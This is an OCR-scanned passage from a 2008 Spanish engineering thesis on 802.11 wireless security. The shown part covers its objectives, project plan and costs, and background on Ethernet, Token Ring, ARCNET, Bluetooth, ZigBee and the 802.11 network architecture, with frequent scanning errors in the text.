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Resumen 



Cada vez mas, las tecnologias inalambricas van ganando protagonismo en la vida 
diaria de las empresas, instituciones y entornos personates. IEEE802.il agrupa un conjunto 
de estandares de comunicacion inalambrica que ofrecen soluciones de comparticion de la 
informacion sin hacer uso de medios cableados. Obteniendo la posibilidad de establecer 
canales de datos entre entornos moviles y estaticos, eliminando las barreras arquitectonicas. 

IEEE802.il supone uno de los estandares de comunicacion por radiofrecuencia mas 
utilizados y populares para redes de area local. No es extrafio que dispositivos como 
ordenadores portatiles, PDA's, consolas de videojuegos, moviles o incluso maquinaria 
industrial hagan uso de este estandar como solucion inalambrica para interconectar y 
transferir cualquier tipo de informacion, datos, voz o video. Como ejemplo de ello, basta con 
realizar una busqueda mediante su ordenador portatil de las redes inalambricas disponibles en 
su entorno, para darse cuenta de la gran acogida que esta tecnologia ha tenido en la sociedad. 

Todo apunta a que el crecimiento y despliegue de este tipo de redes seguira 
aumentando en los proximos anos. Encuestas realizadas por la Asociacion para la 
Investigacion de los Medios de Comunicacion (AIMC) reflejan que el 52 % de los usuarios de 
Internet en 2007 obtuvo acceso a la red de redes a traves de este tipo de tecnologia, frente al 
43% del afio anterior. Pero no solo los usuarios domesticos adquieren productos de la norma, 
instituciones, PYMEs y grandes compafiias cada vez mas hacen uso del estandar esta 
tecnologia como solucion de comunicacion inalambrica. 

Es por ello que no debe descuidarse la seguridad al hacer uso de dispositivos que 
implementen la norma 802.11, puesto que puede suponer una ventana abierta al exterior por 
donde cualquier persona maliciosa pueda robar informacion personal o confidencial, 
pudiendo incluso obtener el control de los activos del usuario. Este proyecto esta orientado a 
analizar los diferentes protocolos y metodologias de proteccion del canal inalambrico, 
realizando un estudio en profundidad de las vulnerabilidades y metodos de ataque. 

Se ha llevado a cabo un analisis del funcionamiento y vulnerabilidades de los tres principales 
protocolos de seguridad en entornos 802.11, WEP, WPA y WPA2. Haciendo uso de 
herramientas de auditoria desarrolladas por investigadores y usuarios de la red de Internet, 



ademas de desarrollar y optimizar otras expresamente para este proyecto, se ha conseguido 
determinar el nivel de riesgo al que estan expuestos los usuarios de esta tecnologia, 
obteniendo resultados sorprendentes que alertan de la escasa preocupacion por la seguridad en 
el mar co del estandar IEEE 8 02. 1 1 . 
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1 Objetivos del proyecto 

El numero de redes inalambricas se ha visto acrecentado en los ultimos afios, esto es 
debido a una rapida evolucion, que las situa, casi a la par en prestaciones con los medios 
cableados. IEEE802. 11 es la especificacion que define un estandar global de comunicaciones 
para redes de area local y que permite la transmision de datos entre diferentes equipos. 
Mediante el uso de radiofrecuencias, la norma, consigue conectar entre si dispositivos moviles 
y estaticos. 

En un entorno donde cada dia se necesita una mayor velocidad de transmision, 
facilidad de despliegue y comodidad de uso, la popularidad de los dispositivos de la norma 
802.11 se han visto fuertemente impulsados. No es extrano encontrar, hoy en dia numerosos 
dispositivos que implementen este estandar, desde ordenadores de bolsillo o consolas de 
videojuegos, a puntos de acceso que proporcionan conexion a Internet en aeropuertos, hoteles 
o empresas. 

Desde las primeras publicaciones del estandar no se ha tardado en encontrar las 
primeras vulnerabilidades, existiendo grupos especializados en seguridad digital, formados 
por ingenieros, matematicos o fisicos que dieron a conocer estas importantes carencias. 

Los mayores perjudicados con el descubrimiento y publication de estas 
vulnerabilidades son los propios usuarios de la tecnologia. Compafiias y particulars pueden 
ver su intimidad comprometida y datos confidenciales de gran valor pueden ser robados. Cabe 
sobretodo destacar las perdidas que se pueden producir en el entorno empresarial, robo de 
cuentas, utilization ilicita de information o suplantacion de identidad, son solo algunas de las 
consecuencias que pueden producirse debido a estos agujeros de seguridad. 

Es por ello que el objetivo de este proyecto se centra en el estudio general del estado 
de esta tecnologia y sus herramientas de protection, estudiando el nivel de seguridad 
alcanzable, los metodos de ataque y soluciones para evitar las intrusiones. Se realizara un 
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repaso por los diferentes metodos de cifrado, las herramientas de ataque mas populares y los 
metodos de proteccion utilizados. 

En primer lugar, se tratara de realizar una description del estandar, explicando su 
origen y funcionamiento. Seguidamente el estudio del estado del arte situara al lector en el 
marco de las diferentes tecnologias inalambricas que existen y han existido. Realizando un 
breve repaso de la evolution de la norma 802. 1 1 que permitira comprender el estado actual. 

En un segundo bloque, se expondran los diferentes protocolos de seguridad que 
existen para este tipo de redes, realizando una exposition detallada de como funcionan y sus 
posibles vulnerabilidades. 

Por ultimo, este proyecto se centrara en un estudio practico demostrativo, de los 
diferentes metodos de ataque que puede sufrir esta tecnologia. Esta practica se plantea bajo 
una base teorica de la seguridad 802.11. Se documentaran experiencias sobre dispositivos 
reales que permitiran mostrar como es posible explotar facilmente las vulnerabilidades con la 
ayuda de herramientas, algunas de las cuales se desarrollaran especificamente para este 
proyecto. 

Destacaremos un entorno de trabajo basado en el sistema operativo Linux, el cual 
provee de numerosas herramientas de auditoria de seguridad con un facil acceso y manejo. 
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2 Plan de Proyecto 

Para alcanzar los objetivos propuestos, es necesario descomponer y planificar las 
tareas a llevar a cabo durante todo el proceso de desarrollo de los trabajos, identificando las 
actividades e hitos segun corresponda, adjuntando a su vez, una pequefia resefia de los perfiles 
necesarios para el proyecto. 

Por otra parte se procede a realizar un estudio de la viabilidad economica del proyecto, 
estableciendo los costes del desarrollo de las diferentes tareas y determinando la valoracion 
economica del proyecto. 

2. 1 Planificacion del proyecto 
2.1.1 Perfiles necesarios 



• 



• 



IS, Ingeniero Senior, encargado de la gestion y direccion del proyecto. Entre otras tareas 
realizara el control y seguimiento de las actividades realizadas durante el ciclo de vida del 
proyecto. 

IJ, Ingeniero Junior, encargado de realizar las labores tecnicas del proyecto, desde el 
analisis previo hasta las pruebas practicas definidas en el plan de trabajo. 



2.1.2 Plan de trabajo 



Duracion del proyecto 



Se estima que la duracion del proyecto sea de 21,5 semanas, dando partida el dia 22 
de Octubre de 2007 con la propuesta y concluyendo el dia 21 de Marzo de 2008 con la 
presentacion y cierre del proyecto. El siguiente diagrama de Gantt permite obtener una vision 
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global de las tareas definidas y los plazos de cumplimiento de cada una de ellas. 
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Figura 2.1: Diagrama Gant 

El conjunto de tareas a desarrollar supone una descomposicion en paquetes de trabajo 
y entregables a revisar por el director del proyecto, con este objetivo a continuacion se 
detallan los aspectos comentados. 

Paquetes de trabajo y entregables 

Se identifican 4 paquetes de trabajo, agrupando cada uno de ellos un conjunto de 
tareas e hitos a desarrollar, la tabla siguiente establece la asignacion de los comentados hitos y 
actividades por paquete de trabajo. Destacar que la consecucion de un hito genera un 
entregable al director de proyecto. 



Paquete de trabajo 


Tareas a realizar 


Hitos 


Entregables 


PT1 


Revision del estado del arte 


HI 


El -Estado del arte. doc 


PT2 


Estudio teorico de la seguridad 


H2 


E2-Estudio teorico.doc 


PT3 


Estudio practico de la seguridad 


H3 


E3 -Estudio practico WEP.doc 


H4 


E4-Estudio practico WPA.doc 


PT4 


Resultados y presentation 


H5 


E5-Conclusiones.doc 



Tabla 2.1: Asignacion de hitos y actividades 
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Asignacion de recursos 

Principalmente existen dos tareas a llevar a cabo y que coinciden con los perfiles que a 
continuacion se definen, una tarea de direccion y una tarea de desarrollo tecnica. La primera 
sera llevada a cabo por un ingeniero senior, a partir de ahora denominado como IS y la 
segunda por un ingeniero junior o IJ. La siguiente tabla muestra el esfuerzo dedicado por cada 
categoria asi como la asignacion de las tareas a realizar. 



Categoria 
laboral 


Tareas a realizar 


Duration 
(dias laborables) 


Horas por 
dia 


Esfuerzo en 
horas 


IJ 


Propuesta y analisis 


6 dias 


5h 


30 h 


Planificacion 


6 dias 


5h 


30 h 


Revision bibliografica 


88 dias 


lh 


88 h 


Revision del estado del arte 


13 dias 


5h 


65 h 


Estudio teorico de la 
seguridad 


21 dias 


5h 


105 h 


Estudio practico de la 
seguridad 


41 dias 


5h 


205 h 


Resultados y presentation 


7 dias 


5h 


35 h 


IS 


Direccion del proyecto 


104 dias 


0,25 h 


26 h 



Tabla 2. 2: Asignacion de tareas y esfuerzo 



De esta manera el esfuerzo total en horas que requiere el proyecto de Analisis de la 
seguridad en redes 802.1 1 es de 584 horas, donde para cada categoria laboral se requiere el 
esfuerzo siguiente. 



Categoria 


Esfuerzo 


IS 


26 horas 


IJ 


558 horas 



Tabla 2. 3: Esfuerzo por categoria 



2.2 COSTES DEL PROYECTO 



A continuacion se analizan los costes que supone llevar a acabo el proyecto de 
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Analisis de la seguridad en redes 802.11. Para ello se establece un coste por cada categoria 
laboral de 35 euros la hora para el IJ y de 65 euros la hora para el IS. Asi mismo se asume que 
para las tareas que requieren el uso de computadores de gran capacidad de calculo, debido a la 
naturaleza del estudio, se establece que la hora de CPU tiene un coste de 1 euro para un P4 
2,66 Ghz y de 1,25 euros para los P4 3 Ghz. De esta forma los costes del proyecto vendrian 
definidos en la siguiente tabla. 



ESTIMACION ECONOMICA DEL PROYECTO 



ESTIMACION DE COSTES Y GASTOS 



Costes de personal 


Categoria 


Horas 


Precio 


Contingencia 


Total 


IS 


26 h 


65 e 


1,10 


1.859 e 


IJ 


558 h 


35 e 


1,02 


13.920 e 


Total costes personal 


15.779 e 



Costes Indirectos 



3 % sobre los costes directos 



Total costes indirectos 



473 e 



Costes Varios 

Alquiler de computadores: 


CPU 


Numero 


Precio hora CPU 


Uso 


Total 


2,66 Ghz 


6 procesadores 


1 euro 


11 dias 


1.585 e 


3Gh 


8 procesadores 


1,25 euros 


1 1 dias 


2.640e 


Total costes varios 


4.225 e 



Precio del proyecto 


Total costes del proyecto 


20.477 e 


+16%IVA 


23.753 e 



Tabla 2.4: Costes del proyecto 
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3 ESTADO DEL ARTE 

Desde el origen de las primeras computadoras ha existido la necesidad de establecer 
una comunicacion entre ellas con el objetivo de compartir la informacion. Asi pues esta 
necesidad genero a finales de los afios 70 un interes creciente en implementar sistemas de 
comunicacion entre ordenadores. Un factor muy importante a tener en cuenta era la distancia 
que separaba a estas computadoras, desde entonces se puede realizar una categorizacion 
segun este factor. Para redes de conexion en un entorno local se habla de sistemas LAN o 
Local Area Network, su extension esta limitada fisicamente a un edificio o a un entorno de 
unos pocos kilometros. Para distancias que implican una cobertura regional, se emplea el 
termino MAN o Metropolitan Area Network. El concepto de red de area metropolitana 
representa una evolucion de la mencionada red de area local, ampliando el ambito de 
cobertura. En algunos casos no se limitan a un entorno metropolitano sino que pueden llegar a 
una cobertura regional e incluso nacional mediante la interconexion de diferentes redes de 
area metropolitana. Por ultimo, tenemos las denominadas Redes de Area Amplia, con 
frecuencia denominada WAN, acronimo de la expresion en idioma ingles Wide Area 
Network. Es un tipo de red de computadoras capaz de cubrir distancias de 100 a 1000 km. 

El objetivo de este proyecto estara centrado en las redes de area local, ya que es el 
entorno para el cual esta disenado el estandar 802.11. Es interesante repasar los distintos 
sistemas de comunicacion existentes y su evolucion, dentro de las redes de area local y 
dispositivos de comunicacion inalambrica. Esto permite contextualizar el estandar 802.11 
dentro del gran abanico de sistemas existentes. 
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3.1 ESTANDARES DE COMUNICACION EN REDES DE AREA LOCAL Y 

COMUNICACIONES INALAMBRICAS. 

Es posible realizar una clasificacion de los estandares de comunicacion por el medio 
fisico que utilizan para transmitir la informacion. Asi pues tenemos sistemas cableados, que 
utilizan un medio guiado para transmitir informacion y sistema inalambricos, aquellos que 
utilizan el aire como medio de transmision. El estandar 802.11 de IEEE -Instituto de 
Ingenieros Electricos y Electronicos, formaria parte de este ultimo grupo. 



3.1.1 ESTANDARES DE COMUNICACION CABLEADOS. 

Hoy en dia existen basicamente tres tecnologias de comunicacion en entornos de area 
local: Ethernet, Token Ring y ArcNet. 

El estandar IEEE 802.3 se le denomina Ethernet y fue creado por la empresa Xerox en 
1974. Este se encarga de definir las caracteristicas de cableado y sefializacion de nivel fisico 
y los formatos de trama del nivel de enlace de datos del modelo OSI. Este estandar se puede 
decir, que sienta las bases tecnologicas que utilizara el sistema estudiado, el 802.11. El 
documento preliminar que describe el estandar cableado fue aprobado en 1983 y fue 
publicado oficialmente en 1985 por el ANSI/IEEE. Desde entonces un gran numero de 
mejoras al estandar han sido publicadas para tomar ventaja de los avances tecnologicos y 
poder utilizar distintos medios de transmision, asi como velocidades de transferencia mas 
altas y controles de acceso a la red adicionales. Sin duda es el sistema mas utilizado 
actualmente para la interconexion de computadoras en entornos locales. Su gran aceptacion es 
debida a altas tasas de transferencia, un facil despliegue y un coste bajo de sus productos. 
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JQ Q P 



Figura 3.1: Red Ethernet Tipica 

El estandar 802.3 define la forma en que los ordenadores de la red envian y reciben 
datos sobre un medio fisico compartido que se comporta como un bus logico, 
independientemente de su configuracion fisica. Originalmente fue disefiada para enviar datos 
a 10 Mbps, aunque posteriormente ha sido perfeccionada y puede alcanzar 100 Mbps, 1 Gbps 
o 10 Gbps incluso se habla de versiones futuras de 40 Gbps y 100 Gbps. En sus versiones de 
hasta 1 Gbps utiliza el protocolo de acceso al medio CSMA/CD o Carrier Sense Multiple 
Access / Collision Detect, Acceso multiple con deteccion de portadora y deteccion de 
colisiones. 

Para la norma de 10 Mbps se definieron conexiones con cable coaxial fino 10Base2, 
con tramos conectados entre si mediante conectores BNC; par trenzado categoria 3 (10 
BaseT) con conectores tipo RJ45, e incluso conexiones de fibra optica lOBaseF. 

Los estandares sucesivos a 100 Mbps (Fast Ethernet), Gigabit Ethernet y 10 Gigabit 
Ethernet abandonaron los coaxiales dejando unicamente los cables de par trenzado sin 
apantallar UTP - Unshielded Twisted Pair, de categorias 5 y fibra optica. 

En los anos 70 IBM desarrolla Token Ring, tecnologia todavia utilizada pero en menor 
uso, que describe una comunicacion basada en anillo. La especificacion se recoge en el 
estandar IEEE 802.5 de 1982. Su funcionamiento se basa en un token o testigo, que es 
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pasado de computadora en computadora. Cuando una de ellas desea transmitir datos, debe 
esperar la llegada del token vacio, el cual tomara e introducira los datos a transmitir, y enviara 
el token con los datos al destino. Una vez que la computadora destino recibe el token con los 
datos, lo envia de regreso a la computadora que lo envio con los datos, con el mensaje de que 
los datos fueron recibidos correctamente, y se libera el token, yendo nuevamente de 
computadora en computadora hasta que otra maquina desee transmitir, y asi se repetira el 
proceso. 



n 

1" H\ 


■ S'\ — ( 




Figura 3.2: Arquitectura en anillo Token Ring 



El token pasa de maquina en maquina en un mismo sentido, esto quiere decir que si el 
una computadora desea emitir datos a otro cliente que esta detras, el testigo debera dar toda la 
vuelta hasta llegar al destino. Su velocidad es de 4 6 16 Mbps es por esto unido a un coste 
superior que ha caido en desuso en detrimento de Ethernet. 

Por ultimo cabe destacar una tercera tecnologia de red llamada ARCNET. Esta fue 
desarrollada por Datapoint Corporation en 1977, utilizando una tecnica de acceso de paso de 
testigo como Token Ring, con una topologia fisica en forma de estrella. ARCNET era el 
primer sistema extensamente disponible para poder establecer una red para 
microordenadores. Siendo muy popular en los anos 80 para las tareas de la ofimatica. 
Originalmente ARCNET utilizo el cable coaxial de RG-62/U y los hub pasivos o activos en 
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una topologia de bus en estrella cableado. A la hora de su renombre mas grande ARCNET 
gozo de dos ventajas importantes sobre Ethernet. La primera un bus en estrella cableado, 
mucho mas facil de construir y de ampliarse (con una mayor facilidad de mantenimiento) que 
Ethernet lineal. Por otra parte la distancia del cable, los funcionamientos de cable coaxiales de 
ARCNET podrian ampliarse hasta 610 metros entre los hub activos o entre un hub activo y 
un nodo del final, mientras que Ethernet, usada lo mas extensamente posible en aquella epoca, 
fue limitada a un funcionamiento maximo de 1 83 metros, del final al extreme 




Figura 3.3: Arquitectura de una red ARCNET 



Por supuesto, ARCNET requirio un hub activo o pasivo entre los nodos si habia mas 
de dos nodos en la red, mientras que Ethernet finalmente permitio que los nodos fueran 
espaciados dondequiera a lo largo del cable coaxial lineal, pero los hub pasivos de ARCNET 
presentaban una gran ventaja, su bajo coste. Para mediar el acceso en bus, ARCNET utiliza 
un esquema de simbolo o testigo, que pasa de computador en computador. Cuando los pares o 
maquinas estan inactivos, un solo mensaje "simbolico" se pasa alrededor de la red de maquina 
a maquina, y no se permite a ningun par utilizar el bus a menos que tenga el simbolo. Si un 
par en particular desea enviar un mensaje, espera para recibir el simbolo, envia su mensaje, y 
despues pasa el simbolo a la estacion siguiente. 
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3.1.2 ESTANDARES DE COMUNICACION INALAMBRICOS. 

Este proyecto se centra en el estandar de comunicacion inalambrica 802. 1 1 y sus fallos 
de seguridad. Pero esta no es la unica tecnologia sin cables desarrollada hasta la actualidad. Es 
interesante poder ver un estado del arte en este medio de comunicacion y donde enmarcar el 
estandar de IEEE. Existen principalmente otras dos tecnologias inalambricas, las cuales 
cubren necesidades diferentes - Bluetooth y ZigBee. 

La tecnologia Bluetooth fue desarrollada por la empresa Ericsson en 1994 y 
posteriormente en 2002 fue utilizado para definir la norma 802.15. Bluetooth permite, 
mediante una conexion inalambrica de corto alcance, conectar entre si moviles, ordenadores, 
PDAs, y un gran abanico de dispositivos. Mediante este sistema, los usuarios pueden 
interconectar sus dispositivos moviles y fijos tambien. El alcance que logran tener estos 
dispositivos es de 10 metros para ahorrar energia, ya que generalmente estos dispositivos 
utilizan mayoritariamente baterias. Sin embargo, se puede llegar a un alcance de hasta 100 
metros similar a 802.11, pero con un aumento del consumo energetico considerablemente. 
Para mejorar la comunicacion es recomendable que ningun objeto fisico, como por ejemplo 
una pared, se interponga. El primer objetivo para los productos Bluetooth de primera 
generacion eran los entornos de la gente de negocios que viaja frecuentemente, pero hoy en 
dia esta ampliamente extendido a cualquier tipo de usuario. 

La especificacion de Bluetooth define un canal de comunicacion de maximo 720 Kbps 
(1 Mbps de capacidad bruta).La frecuencia de radio con la que trabaja esta en el rango de 2,4 
a 2,48 GHz con amplio espectro y saltos de frecuencia con posibilidad de transmitir en Full 
Duplex. Los saltos de frecuencia se dan entre un total de 79 frecuencias con intervalos de 
lMhz; esto permite dar seguridad y robustez. 

La potencia de salida para transmitir a una distancia maxima de 10 metros es de 1 
mW, mientras que la version de largo alcance transmite entre 20 y 30 dBm entre 100 mW y 1 
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W de potencia. 

Para lograr alcanzar el objetivo de bajo consumo y bajo costo, se ideo una solucion 
que se puede implementar en un solo integrado utilizando circuitos CMOS. De esta manera, 
se logro crear una solucion de 9x9 mm y que consume aproximadamente 97% menos energia 
que un telefono celular comun. Hoy en dia existen 3 versiones del estandar la vl.l, vl.2 y 
v2.0. La version 1.2, a diferencia de la 1.1, provee una solucion inalambrica complementaria 
para co-existir con 802.11 en el espectro de los 2.4 GHz, sin interferencia. Por otra parte la 
version 1.2, usa la tecnica "Adaptive Frequency Hopping (AFH)", que ejecuta una 
transmision mas eficiente y una encriptacion mas segura. Para mejorar las experiencias de los 
usuarios, la Vl.2 ofrece una calidad de voz (Voice Quality - Enhanced Voice Procesing) con 
menor ruido ambiental, y provee una mas rapida configuracion de la comunicacion con los 
otros dispositivos Bluetooth dentro del rango del alcance. Por ultimo la version 2.0, creada 
para ser una especificacion separada, principalmente incorpora la tecnica "Enhanced Data 
Rate" (EDR), que le permite mejorar las velocidades de transmision en hasta 3 Mbps a la vez 
que intenta solucionar algunos errores de la especificacion 1.2. 




a 1 ^ — 



\ Ota 



N¥ Is. 
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Figura 3. 4: Diferentes dispositivos y usos de Bluetooth 



25 de 200 



Roberto Amado Gimenez 
06/03/2008 



m 



Escola Tecnica Superior D'Enginyeria 
Analisis De La Seguridad En Redes 802.11 




Por otra parte y como posible competidor de Bluetooth existe la tecnologia ZigBee. 
Este sistema de comunicacion inalambrica fue desarrollado en 2005 por ZigBee Alliance, un 
grupo formado por mas de 100 empresas y que sigue el estandar de la IEEE 802.15.4 para 
redes de area personal inalambricas (WPAN, siglas en ingles). Esta tecnologia esta disenada 
con el objetivo de ser mas simple y barata que otras WPANs como Bluetooth, apuntando su 
uso al de aplicaciones de bajas tasas de datos y bajo consumo electrico. Opera en las bandas 
libres de los 2.4 Ghz, 915 MHz y 868 MHz, usando DSSS como metodo de transmision y 
focalizandose en las capas inferiores de red (Fisica y MAC). La transmision se realiza a 20 
kbit/s por canal y el rango de transmision esta entre los 10 y 75 metros. En lo que respecta al 
consumo, Bluetooth y 802. 1 1 consumen mucha energia y sus anchos de banda son demasiado 
altos para las transmisiones maquina-maquina que pretende ZigBee. Este estandar esta 
pensado basicamente para dispositivos que requieran tasas bajas de velocidad sin mucha 
logica, como equipos de musica, sistemas de alumbrado, aire acondicionado, DVD, video, 
camara digital y todo tipo de aparatos que se puedan encontrar en el entorno del hogar o la 
industria. Es por ello que esta tecnologia esta pensada para ser utilizada en el ambito de la 
domotica. Una red ZigBee puede estar formada por 255 nodos los cuales tienen la mayor 
parte del tiempo el transceiver ZigBee dormido con la finalidad de consumir menos energia. 
El objetivo, es que un sensor equipado con un transceiver ZigBee pueda ser alimentado con 
dos pilas AA durante al menos 6 meses y hasta 2 anos. Como comparativa, la tecnologia 
Bluetooth es capaz de llegar a 1 MB/s en distancias de hasta 10 m operando en la misma 
banda de 2,4 GHz, solo puede tener 8 nodos por celda y esta disenado para mantener sesiones 
de voz de forma continuada, aunque pueden construirse redes que cubran grandes superficies 
ya que cada ZigBee actua de repetidor enviando la serial al siguiente. En cuanto a los 
dispositivos, estos se direccionan empleando 64-bits y la posibilidad de utilizar uno corto 
opcional de 16 bits. El campo de direccion incluido en MAC puede contener informacion de 
direccionamiento de ambos origenes y destinos (necesarios para operar punto a punto). Este 
doble direccionamiento es usado para prevenir un fallo dentro de la red. 

Por ultimo, dentro de esta clasificacion de tecnologias inalambricas para entornos 
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locales, estaria el objetivo de este proyecto, que es el estandar 802.11. Este sera expuesto en 
mayor detalle en puntos posteriores. Pero ahora es interesante esquematizar, como se observa 
en el cuadro siguiente, la aparicion, uso y evolucion de las 3 tecnologias ademas una nueva 
en desarrollo y evolucion de Bluetooth llamada Wibree. 



Estandar 


Ancho de 
Banda 


Consumo/Potencia 


Ventajas 


Aplicaciones 


Bluetooth 
(1994) 


1Mbps 


40ma transmitiendo, 
0.2ma en reposo 


Interoperatividad, 
sustituto del cable 


Wireless USB, 
moviles, informatica 
casera 


802.11 
(1997) 


Hasta 54 Mbps 


400ma transmitiendo, 
20ma en reposo 


Gran ancho de 
banda 


Navegar por 
Internet, redes de 
ordenadores, 
transferencia de 
ficheros 


ZigBee 
(2005) 


250Kps 


30ma transmitiendo, 
3ma en reposo 


Bateria de larga 
duracion, bajo coste 


Control remoto, 
productos 
dependientes de la 
bateria, sensores , 
jugueteria 


Wibree 
(2006) 


1Mbps 


Menor que Bluetooth 


Muy bajo consumo 


Wireless USB, 
moviles, informatica 
casera 



Tabla 3.1: Estdndares inaldmbricos. 



Tras este repaso de las diferentes tecnologias de comunicacion, su origen y evolucion, 
es conveniente realizar una description del estandar 802.11, como se origino y los aspectos 
fundamentales de su funcionamiento, necesarios para comprender sus fallos de seguridad. 
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3.2 El estandar 802.11 

La primera aproximacion del estandar 802.11 fue desarrollada en 1997 por la 
asociacion tecnico-profesional ANSI/IEEE (Instituto Nacional Estadounidense de 
Estandares/Institute of Electrical and Electronics Engineers). Su objetivo principal fue definir 
tanto la capa fisica del estandar como la capa de enlace (MAC). 

802.11 forma parte de la familia de estandares de redes locales y metropolitanas. La 
relacion con los otros miembros de su familia se puede ver en la figura 1 . 
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•Formerly IEEE Sid 802. 1A. 

Figura 3.5: Esquema de estandares 802.x 

El proposito del estandar 802.11 es proveer a los equipos, estaciones de trabajo y 
maquinaria de una conectividad inalambrica, la cual permita el libre movimiento de los 
clientes sin una perdida de conexion. El estandar provee el acceso a una banda de frecuencias 
dedicada para redes LAN. En especial se ocupa de: 

• Describir las funciones y servicios requeridos por un dispositivo adherido a la 



28 de 200 



Roberto Amado Gimenez 
06/03/2008 



m 




Escola Tecnica Superior D'Enginyeria 
Analisis De La Seguridad En Redes 802.11 

norma para operar en modo "Ad hoc" 1 o Infraestructura dentro de una red, asi 
como los aspectos de movilidad y transicion. 

• Define los procedimientos de la capa MAC para dar soporte a MSDU (unidad 
de servicio asincrono MAC) de servicios de entrega. 

• Define varias tecnicas fisicas de serial y funciones para el interfaz que son 
controladas por la capa MAC. 

• Permite las operaciones para que un dispositivo que siga la norma, pueda 
coexistir con otros dispositivos 802. 1 1 dentro de una LAN. 

• Describe los procedimientos y requerimientos para dar privacidad a la 
informacion transmitida dentro de un medio inalambrico, asi como 
autentificacion de dispositivos 802. 1 1 

Estos propositos pueden ser similares a los de una red cableada comentada antes pero, 
^que puede hacer diferente a una LAN inalambrica de una cableada? Existen varias 
caracteristicas que las hacen diferentes. En una LAN IEEE 802.3 se puede afirmar que una 
direccion es equivalente a una localizacion fisica, por el contrario en una LAN inalambrica el 
direccionamiento se realiza referente a la STA, que puede no ocupar una posicion fija. Por lo 
tanto el medio fisico de transmision afecta a la arquitectura definida por el estandar, 
presentando las siguientes diferencias: 

• Usa un medio que no tiene unas fronteras claramente definidas y observables. 

• Esta desprotegido de las sefiales externas. 

• La comunicacion se realiza por un medio mucho menos confiable que el 



1 Ad hoc es una expresion latina que significa literalmente "para esto", por ejemplo, un instrnmento ad hoc es una herramienta elaborada 
especificamente para una determinada ocasion o situacion. En sentido amplio, podria traducirse ad hoc como especifico o especificamente. 
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cableado. 

• Presenta topologias dinamicas. 

• No se puede afirmar que una STA conozca el conjunto estaciones vecinas, 
estas pueden permanecer ocultas conforme a otras. 

• Presenta variaciones de tiempo, propiedades de propagacion asimetricas. 

Pueden existir dos conceptos de estaciones, aquellas portables o aquellas moviles. La 
primera esta referida a toda STA que para transmitir utiliza una localizacion fija, mientras que 
la segunda el intercambio de datos se realiza en movimiento. El estandar 802. 1 1 no se limita a 
la primera. 

Uno de los objetivos principales del estandar es dar una apariencia a las capas 
superiores (LLC) de red compatible 802.x, esto hace que se incorporen nuevas 
funcionalidades a la capa MAC. 

Pero, el estandar 802.11 no plantea un unico objetivo tecnologico sino que es muy 
amplio y lo conforman varios grupos de trabajo orientando sus desarrollos a diferentes areas 
o campos: 

• IEEE 802. 1 la - 54 Mbit/s, 5 GHz estandar (1999) 

• IEEE 802. 1 lb - Mejoras a la 802. 1 1 para soporte 5.5 Mbit/s y 1 1 Mbit/s (1 999) 

• IEEE 802.11c - Define las caracteristicas que necesitan los APs para actuar 
como puentes (2001). 

• IEEE 802.1 Id - Su objetivo es permitir compatibilidades entre paises a nivel 
MAC (2001) 

• IEEE 802. lie- Mejoras, QoS (2005) 

• IEEE 802. 1 IF - Interoperabilidad de puntos de acceso(2003) 
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IEEE 802. llg - 54 Mbit/s, 2.4 GHz estandar compatible con "b" (2003) 

IEEE 802. 1 lh - Control de potencia de transmision (2004) 

IEEE 802. Hi - Mejora de seguridad WPA para el borrador y WPA2 para la 
version final(2004) 

IEEE 802. 1 lj - Extensiones para Japon (2004) 

IEEE 802.11k - Calcula y valora los recursos de radiofrecuencia para una 
mejora de la gestion (2007?) 

IEEE 802. 1 11 - Reservado 

IEEE 802.11m - Mantenimiento del estandar. 

IEEE 802.1 In - 500Mbit/s (2007) 

IEEE 802. 1 lo - Reservado 

IEEE 802. lip- WAVE - Acceso inalambrico para vehiculos. (2008?) 

IEEE 802. 1 lq - Reservado 

IEEE 802. 1 lr - Movilidad en entornos inalambricos (2007) 

IEEE 802. 1 Is - ESS red de mallas (2008?) 

IEEE 802. 1 IT - Prediccion de rendimiento en redes inalambricas (2008?) 

IEEE 802. 1 lu - Cooperacion con redes que no pertenecientes a la 802. 1 1 

IEEE 802. 1 lv - Gestion de red. 

IEEE 802. 1 1 w - Gestion protegida de marcos (2008?) 

IEEE 802. 1 lx - Reservado 
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• IEEE 802. 1 ly - Mitigacion de interferencias 

Pero no todos los grupos de trabajo implementan o usan un protocolo seguridad. El 
interes de este proyecto se centra basicamente en las vulnerabilidades presentes en los 
protocolos usados por alguna norma de las descritas anteriormente, es por ello que este 
proyecto se centrara en los dispositivos desarrollados bajo los grupos de trabajo 802.1 la/b/g. 

3.3 ASPECTOS TECNICOS Y FUNCIONAMIENTO DEL EST AND AR 802. 1 1 

Para poder comprender las posibles vulnerabilidades del estandar y sus diferentes 
protocolos de seguridad es necesario realizar una description del funcionamiento y 
arquitectura de una red basada en 802. 1 1 . 

El estandar define un conjunto de componentes que interactuan entre si, con el 
objetivo de presentar una movilidad de las estaciones, transparentes para las capas superiores. 
Para ello se define el concepto de conjunto basico de servicios (BSS), bloque de construction 
basico de una red 802. 1 1 

La figura 2 muestra un esquema general de la arquitectura. Los ovalos conforman la 
cobertura de de cada BSS. Si cualquier estacion (STA) se saliera del BSS perderia toda 
comunicacion con sus vecinas. 




Figura 3.6: Estructura bdsica 802.11 
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El esquema mas sencillo que se puede dar en este tipo de redes, consistiria en 2 
estaciones conectadas formando un BSS. A este tipo de redes donde no toma parte ningun 
tipo de infraestructura, se denomina red "ad hoc". 

Debido a la corta cobertura que puede proporcionar una BSS, se introduce el concepto 
de sistema de distribucion (DS), pudiendo extender el area de accion conectando entre si 
varios BSS. 

Un DS permite pues, el uso de estaciones moviles. Para ello es necesario implantar un 
punto de acceso (AP) por cada BSS y conectarlos utilizando o bien un medio inalambrico o 
bien uno cableado. Cabe hacer notar que un AP puede ser tambien un STA con direcciones 
diferentes para el medio inalambrico y el sistema distribuido. Un grupo de BSS conforman un 
conjunto de servicios extendidos (ESS). La figura 3 muestra un esquema de estos 
componentes. 

Distribution Si st fin 




ESS 



Figura 3. 7: Esquema de un sistema de distribucion 

La condicion indispensable del ESS es aparecer como una unica red a las capas 
superiores del modelo. Por lo tanto la movilidad de las estaciones por los diferentes BSS es 
transparente para la capa LLC. A un ESS constituido se le asigna un nombre identificador o 
ESSK), tipicamente una cadena ASCII, con el objetivo de poder identificar la red. Este 
ESSK) es transmitido en los paquetes de anuncio de la red con el objetivo de hacerla visible al 
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resto de estaciones que quieran adherirse al sistema. Posteriormente veremos que esto se 
puede evitar para dotar al conjunto, de un nivel de seguridad ligeramente superior. 

Existen diferentes configuraciones o situaciones que se pueden dar en este esquema y 
